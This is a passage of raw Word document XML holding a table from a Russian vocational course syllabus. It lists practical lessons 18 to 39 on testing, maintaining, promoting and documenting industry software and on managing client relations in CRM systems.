                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00D649F0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 18 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Тестирование быстродействия аппаратного обеспечения</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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00D649F0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 19</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Тестирование отраслевого программного обеспечения (удобства установки настройки, инсталляции ПО).</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00582154" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="005C29DB">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 20 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Обслуживание отраслевого программного обеспечения </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00582154" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="005C29DB">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 21</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Обслуживание серверного программного обеспечения</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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="001C7E46">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 22 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Диагностика отраслевого программного обеспечения </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00582154" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="001C7E46">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 23 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Составление пользовательской документации к отраслевому программному обеспечению </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00582154" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="009A08CB">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 24</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Оценка качества отраслевого программного обеспечения</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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="003A2B56">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Практическое занятие № 25</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Определение эффективности отраслевого программного обеспечения. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="003A2B56">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 26</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Разработка рекомендаций по эффективному использованию отраслевого программного обеспечения.</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="007F5669">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Раздел 3. Продвижение и презентация программного обеспечения отраслевой направленности (ПК 3.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00582154" w:rsidP="0091628F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00964684">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 27 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Анализ ценообразования программного обеспечения отраслевой направленности</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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00964684">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 28 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Выбор эффективной технологии продвижения программного обеспечения на рынок информационных услуг</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1303E6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00F9446B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 29 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Создание макета электронного баннера компании для продвижения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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00F9446B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 30 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Создание макета презентации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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00F9446B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 31 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Разработка проекта электронной выставки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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00F9446B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 32 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Разработка проекта покупательской конференции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tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00F9446B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Практическое занятие № 33 </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Разработка сайта для продвижения отраслевого программного обеспечения </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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:trHeight w:val="84"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="000C6C5B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Раздел 4 Управление взаимоотношениями с клиентом (ПК 3.4)</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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidTr="00AD2C0E">
        <w:trPr>
          <w:trHeight w:val="84"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 34</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Освоение техники управления контактами, клиентской базой и электронной торговлей в CRM-системе</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trHeight w:val="84"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 35</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Создание базы данных клиентов средствами системы CRM</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trHeight w:val="84"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 36</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Разработка анкеты для интервьюирования клиентов</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trHeight w:val="84"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4562" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 37</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Формирование статистических и аналитических отчетов по продажам</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 38</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Реализация информационной поддержки интернет-магазина компании</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00E84BE5" w:rsidRPr="00617AC0" w:rsidRDefault="00E84BE5" w:rsidP="00E50AAC">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Практическое занятие № 39</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Разработка системы собственных взаимоотношений с клиентами</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="438" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
